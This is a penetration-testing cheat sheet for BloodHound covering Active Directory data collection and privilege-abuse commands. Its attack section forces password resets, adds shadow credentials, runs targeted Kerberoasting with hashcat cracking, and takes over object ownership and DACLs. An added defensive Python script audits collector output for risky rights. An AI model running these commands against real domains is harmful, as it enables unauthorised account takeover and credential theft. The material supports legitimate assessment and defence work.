Bloodhound CheatSheet


BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory or Azure environment.

1.0 Installation

apt install bloodhound

2.0 Configuration

neo4j console
2025-01-03 14:44:26.560+0000 INFO  Bolt enabled on localhost:7687.
2025-01-03 14:44:27.123+0000 INFO  Remote interface available at http://localhost:7474/
2025-01-03 14:44:27.125+0000 INFO  id:

Connect to http://localhost:7474/ and change the default password (neo4j:neo4j) to something stronger.

3.0 Usage

Run with:

bloodhound

3.1 Collect AD Data

3.1.1 NetExec

nxc ldap $ip -u $user -p $pass
nxc ldap $ip -u $user -p $pass --bloodhound --collection All
nxc ldap $ip -u $user -p $pass --bloodhound --collection All --dns-server $dnsip

3.1.2 bloodhound.py

git clone https://github.com/dirkjanm/BloodHound.py

# Method 1 (DNS IP):
python bloodhound.py -d $domain.local -u $user -p $pass -c All,LoggedOn -dc $dcname.$domain.local --zip -ns $dnsip

# Method 2 (DNS Name):
python bloodhound.py -d $domain -c All,LoggedOn --zip -ns $dnsserv -u $user@$domain -p $pass

3.2 Attribute Attacks

3.2.1 ForceChangePassword

net rpc password $targetuser $targetpass -U 'domain.local/'$user'%'$pass -S 'domain.local'

3.2.2 GenericAll

Manipulate msDS-KeyCredentialLink and request a TGT (pywhisker), or run a targeted Kerberoast against the object:

pywhisker -d 'domain.local' -u $user -p $pass --target $targetuser --action 'add'
python targetedKerberoast.py -v -d 'domain.local' -u $user -p $pass

Afterwards, crack the hash with:

hashcat -m 13100 file.hash /lists/pass.file

3.2.3 GenericWrite

3.2.4 WriteOwner

Set the controlled user as the object owner:

impacket-owneredit -action write -new-owner "$ControlledUser" -target "$TargetObject" "$domain/$ControlledUser:$Pass"

Afterwards gain FullControl rights for the object:

impacket-dacledit -action 'write' -rights 'FullControl' -principal "$ControlledUser" -target "$TargetObject" "$domain/$ControlledUser:$Pass"

At this point, try [[CRD - Shadow Credentials]] to get the Object NTLM Hash, instead of changing the password.
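
The rights listed in 3.2 are exactly what a defender should hunt for in the data collected in 3.1. The following is an added example (not part of this cheat sheet or of BloodHound) that audits the BloodHound v4 JSON layout (`ObjectIdentifier`, `Properties.name`, `Aces[].PrincipalSID/RightName`) written by bloodhound.py --zip and SharpHound, and reports takeover rights held by anyone other than the built-in admin groups; the sample data is constructed, not real collector output.

```python
import json
from typing import Iterable

# Rights from section 3.2 that allow a principal to take over the target object
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                   "ForceChangePassword", "AddKeyCredentialLink", "Owns"}

# Well-known RIDs / SIDs expected to hold these rights: Administrator (500), Domain Admins (512),
# Schema Admins (518), Enterprise Admins (519), BUILTIN\Administrators, SYSTEM
EXPECTED_ADMIN_RIDS = {"500", "512", "518", "519"}
EXPECTED_ADMIN_SIDS = {"S-1-5-32-544", "S-1-5-18"}


def _is_expected_admin(sid: str) -> bool:
    return sid in EXPECTED_ADMIN_SIDS or sid.rsplit("-", 1)[-1] in EXPECTED_ADMIN_RIDS


def risky_aces(objects: Iterable[dict]) -> list[tuple[str, str, str]]:
    """Return sorted (principal, right, target) triples for takeover rights held by
    non-admin principals. `objects` is the concatenated "data" array of the
    BloodHound v4 users.json / groups.json / computers.json files."""
    objects = list(objects)
    # Resolve PrincipalSID to a readable name using every object's own SID
    sid_to_name = {o["ObjectIdentifier"]: o["Properties"]["name"] for o in objects}
    findings = set()
    for obj in objects:
        target = obj["Properties"]["name"]
        for ace in obj.get("Aces", []):
            sid, right = ace["PrincipalSID"], ace["RightName"]
            if right not in TAKEOVER_RIGHTS or _is_expected_admin(sid):
                continue
            findings.add((sid_to_name.get(sid, sid), right, target))
    return sorted(findings)


# Constructed sample (not real output): Domain Admins owning ALICE is expected, but plain user
# BOB holds GenericAll over ALICE and the HELPDESK group can ForceChangePassword on the DC account.
SAMPLE_DATA = json.loads("""
{"data": [
 {"ObjectIdentifier": "S-1-5-21-1-2-3-512", "Properties": {"name": "DOMAIN ADMINS@DOMAIN.LOCAL"}, "Aces": []},
 {"ObjectIdentifier": "S-1-5-21-1-2-3-1105", "Properties": {"name": "BOB@DOMAIN.LOCAL"}, "Aces": []},
 {"ObjectIdentifier": "S-1-5-21-1-2-3-1120", "Properties": {"name": "HELPDESK@DOMAIN.LOCAL"}, "Aces": []},
 {"ObjectIdentifier": "S-1-5-21-1-2-3-1104", "Properties": {"name": "ALICE@DOMAIN.LOCAL"},
  "Aces": [{"PrincipalSID": "S-1-5-21-1-2-3-512", "PrincipalType": "Group", "RightName": "Owns", "IsInherited": false},
           {"PrincipalSID": "S-1-5-21-1-2-3-1105", "PrincipalType": "User", "RightName": "GenericAll", "IsInherited": false}]},
 {"ObjectIdentifier": "S-1-5-21-1-2-3-1000", "Properties": {"name": "DC01.DOMAIN.LOCAL"},
  "Aces": [{"PrincipalSID": "S-1-5-21-1-2-3-1120", "PrincipalType": "Group", "RightName": "ForceChangePassword", "IsInherited": true}]}
]}
""")["data"]

if __name__ == "__main__":
    for principal, right, target in risky_aces(SAMPLE_DATA):
        print(f"{principal} has {right} on {target}")
```

Feed it the unzipped collector output (`json.load(open("users.json"))["data"] + json.load(open("groups.json"))["data"]`) to get the same list without a running Neo4j instance.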

4.0 Hints

  • Mark all owned users as owned!
  • Select user and check AD permissions
    • Node info
    • Transitive Object Control
    • local admin

4.1 Custom Queries

git clone https://github.com/CompassSecurity/BloodHoundQueries
cd BloodHoundQueries
BloodHound_Custom_Queries_Merger
./bloodhound-customqueries-downloader

4.2 Neo4j Database Queries

4.2.1 Create new database

create database newdb

Requires Neo4j Enterprise Edition; Community Edition supports a single database only.

4.2.2 Switch database

:use newdb

5.0 References

6.0 Tags

  • #OS/Kali
  • #Label/CheatSheet
  • #public